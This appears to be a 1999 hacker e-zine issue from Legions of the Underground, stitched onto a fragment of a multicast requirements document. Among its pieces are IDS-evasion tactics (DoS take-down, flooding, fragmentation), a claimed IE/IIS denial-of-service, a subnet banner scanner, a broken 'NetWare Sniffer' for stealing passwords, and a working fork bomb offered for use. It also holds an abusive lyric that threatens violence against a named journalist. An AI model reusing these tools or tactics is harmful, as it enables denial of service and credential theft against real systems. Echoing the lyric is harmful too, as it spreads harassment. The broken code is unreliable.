Reliability Range k-reliability QoS Throughput 10 Kbps Latency no requirement Jitter no requirement Precedence/Priority Per-message Reliability communication channel dependent Capacity communication channel dependent 4.3 Voice/Video Teleconference 4.3.1 Application Use Voice/video teleconferences impose soft real-time constraints on the communication system.. Latency is the principal concern because of human perception limitations. Reliability is not a principal concern since data is redundant and is dependent more on freshness. Loss of video data transmission, for example, may result in slight differences in color or a fuzzy picture. There is no state to maintain or distribute since audio/video consists of a stream of transition states. Depending on the quality of signals transmitted, throughput demands can be very high. Telephony quality voice, for example, demands only 64 Kbps, while to transmit NTSC video of 30 frames a second, could require a full FDDI level of 100 Mbits/sec. Compression is typically used to lower this throughput requirement. The distribution of this type of data does require the reserving of net resources for the purpose of assuring a QoS level where, typically, latency and jitter are the constraints. Video teleconference requires group formation policy that allows initiating a session, joining existing sessions, leaving a session without tearing it down if any participants remain connected, and terminating the session. It requires the capability to conduct a tightly-controlled N X N session if the number of participants is restricted; or, a loosely-controlled session in a session from 1 to N where the number of participants may be quite large. In any case, control over group membership must be available. 4.3.2 Communication Requirements Characteristic: Range of Values: ------------------------------------------------------------------------ Group Management Known Topology MP<->MP Scalability 15 Ordering Causal Reliability Range best effort QoS Throughput 64 Kbps - 1 Mbps Latency 1 sec. Jitter 125 ms. Precedence/Priority per-session Reliability communication channel dependent Capacity communication channel dependent 4.4 Voice/Video Broadcasting 4.4.1 Application Use The broadcasting of voice and video differs from the VTC in its requirements since there is no need to provide a return channel from the receives to the transmitter. The non-interactive nature also imposes less stringent demands for latency and jitter. Digital video and audio require periodic updates of information to prevent the image or voice playback from degrading 4.4.2 Communication Requirements Characteristic: Range of Values: -------------------------------------------------------------------------- Group Management Known Topology PT->MP Scalability 1000 Ordering Causal Reliability Range best effort QoS Throughput 64 Kbps - 1 Mbps Latency 5 secs Jitter 1 sec. Precedence/Priority per-session Reliability communication channel dependent Capacity communication channel dependent 4.5 Interactive multimedia 4.5.1 Application Use Collaborative work tools, planning tools and distributed whiteboards are examples of interactive multimedia applicatons. A distributed whiteboard is a conferencing tool that distributes pages of a whiteboard such that any participant can draw on any page. The goal is to have consistent views across multiple platforms, therefore, the processes implementing the whiteboard must exchange the current state of the data. The operations that any participant performs on a page must be sequenced and timestamped. Each participant is both sender and receiver. Each member is responsible for detecting loss and reporting this to the group and for periodically informing the group of their place in the session. Repair requests could be multicast to the group and any member of the group could effect repair. This, in turn, requires the members of the group to have some concept of the distance to each participant in the group and to invoke an algorithm for repair that minimizes responses to repairs. This can be satisfied by timestamping the status information multicast to the group. Priority is utilized to determine the importance of transmitting the current page, a new page, or repairs to a previous page. Data in these applications are characterized as reliable, duplicate free, ordered by source, and delivered within a finite period of time. 4.5.2 Communication Requirements Characteristic: Range of Values: ------------------------------------------------------------------------- Group Management Known Topology MP<->MP Scalability 15 Ordering Causal Reliability Range Absolute QoS Throughput 64 Kbps - 1 Mbps Latency 150 ms. Jitter .125 ms. Precedence/Priority per-session Reliability communication channel dependent Capacity communication channel dependent 4.6. Time-Sensitive Data Exchange 4.6.1 Application Use Distributed simulations, situational awareness, virutal reality gaming, billing distribution, and the dissemination of stock quotes are examples of real-time data exchanges in this category. Soft real-time means that the applications are time sensitive (as opposed to hard real-time which are time critical). Any virtual environment among hosts in a distributed system that are simulating the behavior of objects in that environment fit this category. Applications like distributed gaming and virtual reality require that terrain and environmental updates be distributed in a multicast fashion with low packet loss and low latency. Objects in this environment are capable of physical interaction and can sense each other by visual and other (sensor) means. These applications are characterized by large scale memberships which need to share a consistent view of the game space even in the face of packet loss. In entertainment scenarios the number of simulated objects could exceed 100,000 where each object produces a realtime flow of 15 packets per second. Unlike applications like videoconferencing, these applications cannot tolerate frequent updates of data to guarantee freshness. Freshness is required yet updates necessarily are infrequent for objects like terrain updates. These applications are intended to work with input to and output from humans interacting with distributed simulators in real time. Human perception is the normal quantifier of latency requitements (approx. 100 milliseconds). Loss rates are stringent but not zero which means that semi-reliable transfer may suffice. Latency must be predictable on the order of a few hundred milliseconds and jitter must not exceed a few milliseconds. There must be support for reserving network resources. Group communication must allow all participants to transmit to all other participants and the group management must allow hundreds of participants to join/leave in less than a second. 4.6.2 Communication Requirements Characteristic: Range of Values: -------------------------------------------------------------------------- Group Management Known Topology MP<->MP Scalability 100,000 Ordering Causal Reliability Range Absolute QoS Throughput 45 Mbps - 600 Mbps Latency 150 ms. Jitter .125 ms. Precedence/Priority per-message Reliability communication channel dependent Capacity communication channel dependent 4.7. Time-Critical Data Exchange 4.7.1 Application Use Air traffic control, realtime sensor systems, and combat data systems are examples of applications in this category. 4.7.2 Communication Requirements Characteristic: Range of Values: -------------------------------------------------------------------------- Group Management Known Topology MP<->MP Scalability 500 Ordering Causal Reliability Range Absolute QoS Throughput kbps-Mbps Latency 20 ms. Jitter 10 ms. Precedence/Priority per-session Reliability communication channel dependent Capacity communication channel dependent 4.8 Replicated Data Base 4.8.1 Application Use The distributed process control or replicated database are in this category. The distinguishing requirement is the need for total order. Application tasks could be divided among processors in a system and data replicated to protect against failures. There is a need to coordinate the tasks and reach consensus on state. Manufacturing process control needs to schedule processes distributed across the system. A consistent database is necessary to reach consensus. 4.8.2 Communication Requirements Characteristic: Range of Values: ------------------------------------------------------------------------ Group Management Known Topology MP<->MP Scalability 100,000 Ordering Total Reliability Range Absolute QoS Throughput 56 Kbps - 1 Mbps Latency 1 sec Jitter 10 ms. Precedence/Priority per-message Reliability communication channel dependent Capacity communication channel dependent [-------------------------------------] kv[6]; /* Intrusion Detection Systems......................ProtocolD */ INTRODUCTION Intrusion Detection Systems or commonly known as IDS is a relatively new type of technology. In short, IDS simply listens for known 'hack' signatures real-time within the data packets. Currently there are two types of IDS systems on the market. These are Network Based IDS and Host Based IDS. This article will attempt to explain what the difference between Network and Host based IDS. Although there are many ways to analyze traffic on a network IDS, I will explore the possibilities of evading one of these methods that uses a method known as 'passive network packet capture' (sniffing). NETWORK IDS : This method of detection puts your network card ] into promiscuous mode and sniffs all traffic going by on the wire. Problems Due to the fact that it must analyze all traffic passing by, many claim that it cannot be done on a high-speed link effectively on a saturated link without dropping packets. Because it sniffs the traffic, it can only analyze the traffic on its own segment. Thus, in a switched environment, you will require an IDS on each segment. HOST IDS : This method only examines only the traffic destined to itself. Problems: Can only analyze the traffic destined to itself. This method requires a client on each host and can become costly. METHODS OF (Network Based) The first problem of course relies on the ability of first detecting a Network IDS system. This is possible by attempting to detect if there are any systems on the network in promiscuous mode. If this is detected, it could either be a sniffer or a network based IDS. Either way, your goal would be to take down this system or flood it to the point where packets begin to be dropped. Currently there are utilities out there that attempts to detect network cards in promiscuous mode. TAKE-DOWN Many sniffer-based IDS systems will fail open. Once this happens, the attacker can continue on to it's targeted host. This can be accomplished through any number of DoS attacks. It should be noted that some systems are resistant to Dos attacks. EVASION ** By-Pass via Flood If the network based IDS cannot be taken off line. Another possible approach Would be to flood the system to the point where it is dropping packets. Once this occurs, it may be possible to then send the actual attack to the desired target with hopes that the IDS system will drop the packet and therefore not be able to detect the signature contained within it. ** Forgery & Fragmentation Typically an IDS system examines packets and compares it's contents to known attack signatures. If the packet can be forged or fragmented properly, it then may be possible to by-pass the IDS. Many IDS's cannot reassemble fragmented packets and compare them to it's list of signatures, thus allowing malicious attack by. Once the packet reaches the destined host, the packets are reassembled and a successful attack is made. SUMMARY Basically there are problems associated with each of these technologies. Ideally, the best solution would have a both network & host based IDS. It should also be noted that various types of IDS's provide many types of Alerting when particular types of attacks occur. This could be in the form of an e-mail, page or SNMP alert. So, if you decide to attempt to DoS the system, an alert of the event still might be made thus alerting them of suspicious activity. Also note that one method of preventing an IDS from being detected and or being taken down is by assigning the network card an address of 0.0.0.0 This will still enable it to sniff the traffic without being detected and have no way of directing an attack directly at the system. It will then use a second network card to send off any alerts or alarms. This second network card is not in promiscuous mode. With this type of design, it makes it difficult to detect and disable the IDS system. [-------------------------------------] kv[7]; /* Another IE Exploit?.................................ntwak0 */ Potential DoS Attack on NT box with port 80 open Jul 15 17:37:21 1999 (By NtWaK0 , slackette ) LOU Efnet #legions Exploit Plat-Form : I did try on NT server 4.0 + IE5 but i am sure it will work with IE4 Exploit Description : All that you need to have is a box with 9x or NT + IE5 on it. Even FULLY patched with, the box test was a server that run FTP anonymous and port 80 was open and an ASP pages on that web. The tester may be able to use either NT or 9x to facilitate this exploit. Narrative will follow detailing steps taken. 1- Open IE5 or IE4 and Click option, then Security, NO to Cookie to activex and to java. In other word put your security to Maximum 2- From the start Menu Click START then RUN. 3- Type the IP address example hit enter 4-If the remote page has an asp page you will see your title bar switching between the two asp's. And your IE title bar will go nuts and you will start getting packets from the remote server. This is what i recieved from sniffer when the server started sending. The default page didn't load and never loaded. If you do not stop IE you will recieve those packets numerous times and your link will be substantially slowed. GET /default.asp 47 45 54 20 2f 64 65 66 61 75 6c 74 2e 61 73 70 ? HTTP/1.1.. 3f 20 48 54 54 50 2f 31 2e 31 0d 0a Accept: image/gi 41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69 f, image/x-xbitm 66 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d ap, image/jpeg, 61 70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 image/pjpeg, app 69 6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70 lication/vnd.ms- 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d powerpoint, appl 70 6f 77 65 72 70 6f 69 6e 74 2c 20 61 70 70 6c ication/vnd.ms-e 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65 xcel, applicatio 78 63 65 6c 2c 20 61 70 70 6c 69 63 61 74 69 6f n/msword, */*.. 6e 2f 6d 73 77 6f 72 64 2c 20 2a 2f 2a 0d 0a Accept-Language: 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a en-us.. 20 65 6e 2d 75 73 0d 0a Server: Microsof 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 t-IIS/4.0.. 74 2d 49 49 53 2f 34 2e 30 0d 0a Date: Thu, 15 Ju 44 61 74 65 3a 20 54 68 75 2c 20 31 35 20 4a 75 l 1999 21:11:12 6c 20 31 39 39 39 20 32 31 3a 31 31 3a 31 32 20 Host: 000.000.00 08 0f 00 70 3a 00 32 30 37 00 32 35 00 2e 30 30 00.. 32 0 30 30 0d 0a Connection: Keep 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 5-Someone could code a program to exploit this infraction, being able to generate a Denial of Service attack on the remote box or on the local box where you have memory consumption. Due to packets received from the remote site. 6-If you also run sniffer you will see what the server is sending . I received about 2 Meg of data from the server. The page never loaded, and the only way to stop that data is to close IE. Exploit Code : N/A Exploit Fix : N/A +---------------oOOo-(NtWaK0)-oOOo--------------------------------+ [-------------------------------------] kv[8]; /* tryseg.c............................................guidob */ // Test for catching the SIGSEGV or SIGBUS without crashing // and combined with try{}catch(){} // Guido Bakker 1999 #include #include #include #include struct report { int err; int sig; int critval; } page1 = { 0, 0, 0 }; void notwithme(int); int beyond(int); int main(){ int i; try{ sigset(SIGSEGV,notwithme); sigset(SIGBUS,notwithme); for(i=10000;;i++){ beyond(i); cout << "Survifed beyond i = " << i << endl; } } catch(report& seite1){ cout << "Yes we made it into the catch()" << endl; cout << "seite1.err is: " << seite1.err << endl; cout << "seite1.sig is: " << seite1.sig << endl; cout << "seite1.critval is: " << seite1.critval << endl; return(0); } catch(...){ cout << "Came to the second catch()" << endl; return(1); } cout << "After the catch block" << endl; return(1); } // end of main() int beyond(int i){ int a[50]; page1.critval = i; // Main operation which causes an unforseen error a[i]=1; return(1); } void notwithme(int sig){ psignal(sig, "Function notwithme() got signal: "); page1.err = 1; page1.sig = sig; throw page1; return; } [-------------------------------------] kv[9]; /* match.c..............................................icesk */ /* by icesk HEH damn i think i've released to many scanners :> */ #include #include #include #include #include #include #include #include #define TIMEOUT 3 void al4rm(int sig); int main(int argc,char **argv) { struct sockaddr_in thaddr; int unf, i; char buf3r[1024], hozt[1024]; if(argc != 4) { printf("icesk; %s [ip mask] [port] [searchword]\n",argv[0]); exit(0); } for(i=1;i<255;i++) { if( (unf = socket(AF_INET, SOCK_STREAM, 0) ) == -1) { printf("c4nt g3t s0ck3t!#@\n"); } thaddr.sin_family = AF_INET; thaddr.sin_port = htons(atoi(argv[2])); thaddr.sin_addr.s_addr = inet_addr(hozt); bzero(&(thaddr.sin_zero), 8); sprintf(hozt,"%s.%d", argv[1], i); signal(SIGALRM, &al4rm); alarm(TIMEOUT); connect(unf, (struct sockaddr *)&thaddr, sizeof(struct sockaddr)); recv(unf,buf3r,sizeof(buf3r),0); if(strstr(buf3r, argv[3]) != NULL) { printf("[%s!%s]; *MATCH*\n", hozt, argv[2]); } strcpy(buf3r,"unf"); } } void al4rm(int sig) { } [-------------------------------------] kv[10]; /* netsniff.c (reprint)..............................mnemonic */ ------------------------------ begin here ------------------------------ /* NetWare Sniffer 1.0 written by Mnemonic */ #include #include #include #include #include #include "structs.h" /* this is at the bottom of my notes in kv5 */ void GetMyAccountPassword(); int main() { char imthinkn; printf("NetWare Sniffer is copyright 1998 Mnemonic, little buddy\n"); printf("Would you like to (a) get the password for the account you're\n"); printf("on now, (b) get the password of another user or application\n"); printf("or (c) quit? ", imthinkn); switch(imthinkn) case 'a': case 'A': GetMyAccountPassword() break; case 'b': case 'B': GetObjectData() break; case 'c': case 'C': return 3; } FORWARD int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop); extern int RetrieveApplicationData(APPLICATION_OBJECT *aop); extern FS_CONNECTION_INFO *GetConnInfo(WORD wConnectionNumber); FORWARD OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType); GLOBAL OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType) { int nIndex; int nNumberObjects = 0; OBJECT *pObject = NULL; OBJECT obj; int nCompletionCode; obj.oid = -1L; /* initial value for scanbinderyobject. must be -1L, gets updated by the function.*/ for (;;) { nCompletionCode = ScanBinderyObject(pszObjectName, wObjectType, &obj.oid, obj.szObjectName, &obj.wObjectType, &obj.byPropertiesFlag, &obj.byObjectFlag, &obj.byObjectSecurity); if (nCompletionCode != SUCCESSFUL) /* problem or finished */ { if (nCompletionCode != NO_SUCH_OBJECT) { if (pObject != NULL) free(pObject); errno = nCompletionCode; return NULL; } break; } nIndex = nNumberObjects++; pObject = (OBJECT *) realloc(pObject, (nNumberObjects * sizeof (OBJECT))); if (pObject == NULL) return NULL; /* do structure assignment to fill array element. */ pObject[nIndex] = obj; } /* end for (;;) */ /* add dummy element */ pObject = (OBJECT *) realloc(pobject, ((nNumberObjects + 1) * sizeof (OBJECT))); if (pObject != NULL) /*zero out of the dummy element. */ memset(&pObject[nNumberObjects], '\0', sizeof (OBJECT)); if (nNumberObjects == 0) errno = NO_SUCH_OBJECT; GetUserAndAppInfo() } GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject) { /*GetConnectionNumber() returns a value rather than an error code so we can use it as an input parameter to GetConnInfo(). */ if (pFSConnInfo == NULL) return -1; strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]); aop->obj.wObjectType = OT_APPLICATION; strcpy(aop->szPassword, argv[nMaxArgs - 1]); fread(&szPassword, sizeof(int), 1, inpf); printf("\nThe password for that account is ", szPassword, "\n"); printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n"); main() return 2; } } void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject) { FS_CONNECTION_INFO *pFSConnInfo; pFSConnInfo = GetConnInfo(GetConnectionNumber()); if (pFSConnInfo == NULL) return -1; /*we have the user information in pFSConnInfo->fsLoggedObject.boj.*/ *pObject = pFSConnInfo->fsLoggedObject.obj; free9pFSConnInfo); strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]); aop->obj.wObjectType = OT_APPLICATION; strcpy(aop->szPassword, argv[nMaxArgs - 1]); fread(&szPassword, sizeof(int), 1, inpf); printf("\nThe password for the account you're on is ", szPassword, "\n"); printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n"); main() return 1; } } ------------------------------- end here ------------------------------- NetWare Sniffer allows you to do one of two things. You can get the password for the account you're on, or get the password for another object. NWS actually retrieves the 128-byte segment which represents an object's password, and then converts this binary string into text. To receive the password to the account you're on, we use functions in the Connection Services. So we can call GetConnectionNumber() to get the number that the file server has assigned to this workstation's connection and call GetConnInfo() to get the name of the user among other information including the password. To get the password for another object we first have to get the name of the object. NWS uses the function GetObjectData() which uses ScanBinderyObject() to populate a structure of type OBJECT. ScanBinderyObject() can be used to retrieve data for more than one object at a time, but will probably end up screwing things up if you try it. The object name argument can contain wildcards (* or ?), and the object type may be passed as OT_WILD. An object name of * and an object type of OT_WILD means return every object in the bindery, which will also screw you up. Because of this, GetObjectData() returns a pointer to an array of OBJECT structures. The last element is a dummy with all fields cleared to 0. NWS then uses GetUserAndApplicationData() to retrieve the password. The bindery is a database where NetWare keeps information about the network resources and users that many function groups use to store and retrieve information. Each file server on a network system has its own bindery, and thus its own group of known objects. The bindery represents objects using object IDs, which are system-generated long (four-byte) integers. NetWare stores them in high-low order. The object ID serves as a handle to object information. The object type identifies the role the object plays in the network environment. Novell reserves type numbers up to 0x8000 for well-known types. Each object may in turn possess identifying characteristics, known as properties. Properties can either be items, which are stored as 128-byte segments of unformatted data, or sets, which are listed of object IDs. Properties are either static or dynamic, and have read/write security protection. Properties have these attributes: The property name is a character string of up to 16 characters, including the null terminator. Property names have the same restrictions on use of characters as object names. The property flags are stored as a one-byte field. They indicate whether the property is static or dynamic, and whether it is an item or a set. Item properties are unformatted binary fields stored in 128-byte segments which are interpreted by applications or NetWare APIs. Sets are lists of object IDs; these are interpreted by NetWare. The property security plays the same role for properties as for objects. The values flag indicates whether the property has been assigned a value. Properties are dependant on objects, which have these attributes: OBJECT ID OBJECT NAME OBJECT TYPE OBJECT FLAG OBJECT SECURITY PROPERTIES FLAG There are two ways of identifying objects. You can use the OBJECT ID or the OBJECT NAME and OBJECT TYPE. These are the properties attributes: OBJECT ID PROPERTY NAME PROPERTY FLAGS PROPERTY SECURITY VALUES FLAG NetWare stores items and sets as 128-byte segments of binary data. With item data, a segment contains anything an application wants it to, with set data, a segment holds 32 object IDs. An item property can only be represented as a variable-length binary, or RAW, column. The only other column that we need is the object ID, so we know who the property belongs to. The structure of the set property table comes clear if we think about what it represents. For example, the properties GROUPS_I'M_IN and GROUP_MEMBERS are used by NetWare to track group membership. A user object may belong to any number of groups. A user group object may contain any number of users. These properties express a relationship of the OBJECTS table with itself. PASSWORD is of type item, and would be structured thus: OBJECT ID SEGMENTS DATA A set property is just an array of OBJECT_IDs. With both item properties and set properties, we don't know how many segments we will retrieve, so we declare pointers to the values, which we will allocate memory for. ------------------------------ begin here ------------------------------ /* structs.h */ #define MSC 510 #define LINT_ARGS /* netware's prolog.h still thinks it's working with microsoft c 4.0 */ #include #include #include #include #ifndef TRUE #define TRUE 1 #endif #ifndef FALSE #define FALSE 0 #endif #define FORWARD extern #define LOCAL static #define GLOBAL #define MAX_OBJECT_NAME_LENGTH 48 #define MAX_PROPERTY_NAME_LENGTH 16 #define SEGMENT_SIZE 128 #define MAX_DIRECTORY_LENGTH 255 #define OT_APPLICATION 0x8001 /* our new object type */ typedef long OBJECT_ID; /* this has to go here */ #define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / sizeof (OBJECT_ID)) typedef int BOOL; typedef BYTE SEGMENT[SEGMENT_SIZE]; typedef struct _OBJECT_ { char szObjectName[MAX_OBJECT_NAME_LENGTH]; WORD wObjectType; OBJECT_ID oid; BYTE byObjectFlag; BYTE byObjectSecurity; BYTE byPropertiesFlag; } OBJECT; typedef struct _ITEM_PROPERTY_ { int nSegments; BYTE *pValue; } ITEM_PROPERTY; typedef struct _PROPERTY_ char szPropertyName[MAX_PROPERTY_NAME_LENGTH]; BYTE byPropertyFlags; BYTE byPropertySecurity; BYTE byValuesFlag; union { ITEM_PROPERTY iProperty; OBJECT_ID *pObjectList; } uPropertyValue; } PROPERTY; typedef struct _OBJECT_INFO_ { OBJECT obj; PROPERTY *pObjectProperties; /* array of unknown size */ } OBJECT_INFO; typedef struct _APPLICATION_OBJECT_ { OBJECT obj; char szPassword[SEGMENT_SIZE]; WORD wMaximumUsers; char szApplicationDirectory[2 * SEGMENT_SIZE]; OBJECT_ID *pAllowedUsers; OBJECT_ID *pCurrentUsers; } APPLICATION_OBJECT; typedef char SERVER_NAME[MAXOBJECT_NAME_LENGTH]; typedef struct _WS_CONNECTION_ { BYTE byInUseFlag; BYTE byOrderNumber; BYTE byNetworkNumber[4]; BYTE byNodeAddress[6]; BYTE bySocketNumber[2[; BYTE byReceiveTimeOut[3]; BYTE byRoutingNode[6]; BYTE byPacketSequenceNumber; BYTE byConnectionNumber; BYTE byConnectionStatus; BYTE byMaximumTimeOut[2]; BYTE byPadding[5]; } WS_CONNECTION; typedef struct _WS_TABLE { SERVER_NAME szServerName; WS_CONNECTION wsc; } WS_TABLE; typedef struct _FS_CONNECTION_ { WORD wConnectionNmber; IPXAddress SationAddres; BYTE byRoutingNode[6]; } FS_CONNECTION; typedef struct _NW_DATE_AND_TIME_ { BYTE byYear; /* 0 to 99; less than 80 is in the 21st century */ /* yes I do realize that when we hit 2000 my program */ /* will screw up and stuff */ BYTE byMonth; BYTE byDay; BYTE byHour; BYTE byMinute; BYTE bySecond; BYTE byDayOfWeek; /* 0 to 6, 0 is sunday */ } NW_DATE_AND_TIME; typedef struct _FS_LOGGED_OBJECT_ { WORD wConnectionNumber; OBJECT obj; NW_DATE_AND_TIME nwdtLoginTime; } FS_LOGGED_OBJECT; typedef struct _FS_CONNECTION_INFO_ { FS_CONNECTION fsConnection; FS_LOGGED_OBJECT fsLoggedObject; } FS_CONNECTION_INFO; #include "blahblah.dec" ------------------------------- end here ------------------------------- ------------------------------ begin here ------------------------------ /* * blahblah.dec - this thing's gonna be used for other stuff I write too */ /* gotta have all o' this stuff to define the types, and also for use in a program that will be in a later kv issue */ extern void AddApplication(void ); extern void AllowedUsers(int nAction); extern int BinderyCheckCode(int nCompletionCode); extern int CheckObject(OBJECT *pObject, char *pszObjectPassword); extern int CheckCommandLineArgs(char * *argv, int argc, int nMaxArgs); extern int CountCurrentUsers(APPLICATION_OBJECT *aop); extern void CurrentUsers(void ); extern void DeleteApplication(void ); extern int DeleteObject(OBJECT *pObject); extern int DeleteObjectProperty(OBJECT *pObject, PROPERTY *pProperty); extern OBJECT *DestroyObject(OBJECT *pObject); extern PROPERTY *DestroyObjectProperty(PROPERTY *pProperty, unsigned short wProperties); extern int GetApplication(APPLICATION_OBJECT *aop); extern int GetUserAndAppInfo(char * *argv, int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop); extern int GetItemOrSet(OBJECT *pObject, PROPERTY *pProperty); extern OBJECT *GetObjectData(char *pszObjectName, unsigned short wObjectType); extern OBJECT_INFO *GetAllObjectInfo(char *pszObjectName, unsigned short wObjectType); exern PROPERTY *GetObjectPropertyData(OBJECT *pObject, char *pszPropertyName); extern int IsUserAllowed(OBJECT *pObject, APPLICATION_OBJECT *aop); extern int IsUsingApplication(OBJECT *pObject, APPLICATION_OBJECT *aop); extern int IsValidName(char *pszObjectName, unsigned short wMaxLength); extern void KillNewLine(char *pszString); extern void ListUsers(APPLICATION_OBJECT *aop, int nUserType); extern int LinkObjectsInSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName); extern int RetrieveApplicationData(APPLICATION_OBJECT *aop); extern int SetItemProperty(OBJECT *pObject, PROPERTY *pProperty); extern int SetObjectData(OBJECT *pObject); extern int SetObject PROPERTYData(OBJECT *pObject, PROPERTY *pProperty); extern int RemoveObjectFromSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName); extern void UpdateApplication(void ); extern int WriteAppDirectory(APPLICATION_OBJECT *aop); extern FS_CONNECTION_INFO *GetConnInfo(unsigned short wConnectionNumber); extern FS_CONNECTION_INFO *GetObjectConnInfo(OBJECT *pObject); extern WS_TABLE *GetWSTables(void ); extern void VerifyLoginStatus(APPLICATION_OBJECT *aop); extern int DirCheckCode(int nCompletionCode); extern void DeleteApplication(void ); extern int CountCurrentUsers(APPLICATION_OBJECT *aop); ------------------------------- end here ------------------------------- kv[11]; /*Liberty............................................guidob */ /* liberty - this will fill up all available swap and memory if no ulimit is set in the kernel, most unix systems that is, it works on all unix systems with local access (at least, the ones i tried) no more activity is possible after a few seconds this is activated. - guidob */ #include #define BUF 4096 int main(int argc, char *argv[]) { strcpy(argv[0], "man telnet\0"); printf("funky malloc() fork() weirdness\n"); printf("by guidob and CoolVibe\n"); do_malloc(BUF); exit(0); } int do_malloc(int buf) { fprintf(stderr, "Doing %d bytes of funky malloc() weirdness\n", buf); printf("put this in the background and logout ;)"); if(fork()) { while(1) { fork(); malloc(buf); } } } [-------------------------------------] kv[12]; /* Rootfest '99 Review.................................lothos */ kv[13]; /* Ode to JP.......................................krankshaft */ Ode to JP (sang to the tune of "Ode to My Car, by Adam Sandler") written by KrankShaft of Legions of the Underground loved by everyone Here we go... Piece of shit media whore I know a piece of shit whore That fuckin' sellout Won't get very far He's a big piece of shit He's bound to get fucking shot JP's going to get broken I'll tie him in a knot (He's a piece of shit) I can't see why he does it He must be smoking crack And he smells real bad Everyone thinks he's really wack (He's a piece of shit) Piece of shit media whore (He's a piece of shit whore) He sucks royal dick That fuckin' pile of shit 100% crap No he won't get very far Fuck you whore He's got no friends, and his site is totally jacked Whoever likes him can lick my sweaty nuck sack (They can bite my ass too) And he's got no fucking skills He'd give anyone a blow Just to hear them say, "I want to be like you, asshole" (You fuckin piece of shit) (Piece of shit media whore) I know a piece of shit whore (JP's a piece of shit whore) I told him to suck my ass (That fuckin pile of shit) That pile of sold-out shit (He never gets very far) Oh now what the fuck did he do What the fuck did he do What the fuck did he do To get in the news You're going to be black and blue Don't even try to sue You better try something new Oh fuck JP Well he lies like a fucking rug JP always fucking stalls And he's gonna get a fat lip And a swift kick to the balls (Ouch ouch ouch) Plus he tries to get everyone busted I had to run to a fucking hangar (He's a pain in my ass) And if a girlie ever see's this whore There's no chance he'll ever bang her (He never ever gets da pussy) JP shut up (Piece of shit whore) You piece of shit whore (I know a piece of shit media whore) You piece of shit whore (Piece of shit whore) And you call us liars (You're a piece of shit whore) Look in the fucking mirror (Piece of shit whore) You'll be seven different colors (You piece of shit media whore) Fucking crowbar into your lap (Piece of shit whore) You'll be puking eve-ry-where (You're a piece of shit whore) (Piece of shit whore) (You're a piece of shit whore) (Piece of shit whore) The whole world thinks your a loser (You're a piece of shit whore) Maybe I'll give you a push (Piece of shit whore...) [-------------------------------------] kv[13]; /* Top WWW Sites......................................ntwak0 */ LOU Fast Handy Links NtWaK0 June 06, 1999 Hello to all my brothers and sisters -;). This time I decide to make some diffrent and handy and that can help everyone. A novie or ereet person. After years of experience in computing field I did find out that if we have nice organized idea/file/links/whatever/you/want, well we do our job better and faster and less stress >>less Coffee. So I decided to put out a nice list that contain security information. I will be keeping this up-to-date and the plan is to have a nice small HTML format file that can be used any where you go just dump it on diskette or what ever you like. Sorry for the list I wished I could make it bigger but I had time restriction. Let IT GROW. ;) I could make the links on different files, but I wanted to have something on one file. So your suggestion are more then welcome. Shout-out to all LOU members /friends. 1. Security 2. Tools 3. Search 4. News Security * Information + http://csrc.nist.gov/secpubs/rainbow È See document: http://csrc.nist.gov/secpubs/rainbow + Canadian gov information È See document: http://csrc.nist.gov/nistpubs/cc/ + Electronically OK! È See document: http://eok.net/ + http://gandalf.isu.edu/security/security.html È See document: http://gandalf.isu.edu/security/security.html + firewall-wizards messages È See document: http://www.nfr.net/firewall-wizards/ + http://www.iss.net/xforce/ È See document: http://www.iss.net/xforce/ + CIAC Bulletins È See document: http://ciac.llnl.gov/ciac/ + Tips of the month È See document: http://199.44.114.223/rharri/tips.htm + http://www.warforge.com/ È See document: http://www.warforge.com/ + NT security È See document: http://www.txdirect.net/users/wall/ntlinks.htm + http://www.fedz.net/ È See document: http://www.fedz.net/ + http://www.daxion.demon.co.uk/ È See document: http://www.daxion.demon.co.uk/ + http://www.infilsec.com/ È See document: http://www.infilsec.com/ + http://gandalf.isu.edu/ È See document: http://gandalf.isu.edu/ + http://www.nfr.net/ È See document: http://www.nfr.net/ + http://www.iss.net/xforce/ È See document: http://www.iss.net/xforce/ + Security Links UNIX NT etc... È See document: http://www.ntsecurity.net/scripts/loader.asp?iD=/security/nt resources.htm + Computers Security information È See document: http://www.alw.nih.gov/Security/security.html + COAST Hotlist kudos È See document: http://www.cs.purdue.edu/coast/hotlist/ + Computer Security Resource Clearinghouse È See document: http://csrc.ncsl.nist.gov/ + Computer Incident Advisory Capability È See document: http://ciac.llnl.gov/ + NT FAQ È See document: http://www.ntfaq.com/ + NT Download Zdnet Site È See document: http://www.zdnet.com/windows/nt/security/ntbugtraq/ + http://www.trustedsystems.com/ È See document: http://www.trustedsystems.com/ + http://www.infowar.com/ È See document: http://www.infowar.com/ + http://www.securezone.com/ È See document: http://www.securezone.com/ + Computers Consulting Links È See document: http://www.ahandyguide.com/cat1/c/c1305.htm + http://www.ntresearch.com/ È See document: http://www.ntresearch.com/ + NT Admin Tools È See document: http://www.ntadmintools.com/ + New dimension security Trainning È See document: http://www.newdimensions.net + Statistics o http://nic.merit.edu:/nsfnet/statistics/ È See document: http://nic.merit.edu:/nsfnet/statistics/ o http://www.hack.gr/cgi-bin/webstats È See document: http://www.hack.gr/cgi-bin/webstats o Get a live Internet Traffic Report È See document: http://www.internettrafficreport.com/ o Web Statistics È See document: http://www.hack.gr/cgi-bin/webstats o Crime Security 